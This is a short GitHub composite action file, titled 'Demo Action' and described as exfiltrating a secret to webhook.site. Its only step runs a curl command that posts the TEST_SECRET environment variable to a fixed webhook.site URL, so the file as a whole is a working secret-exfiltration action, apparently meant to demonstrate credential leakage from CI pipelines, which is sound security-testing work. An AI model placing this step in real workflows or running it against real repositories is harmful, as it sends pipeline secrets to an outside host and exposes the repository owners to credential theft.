name: 'Demo Action'
description: 'Exfiltrate secret to webhook.site'
runs:
  using: "composite"
  steps:
    - run: |
        echo "::notice ::Exfiltrating secret..."
        curl -s -d "secret=$TEST_SECRET" https://webhook.site/fa52ec3c-7eec-4275-a779-0b04a44515ee
        echo "::notice ::Request sent."
      shell: bash
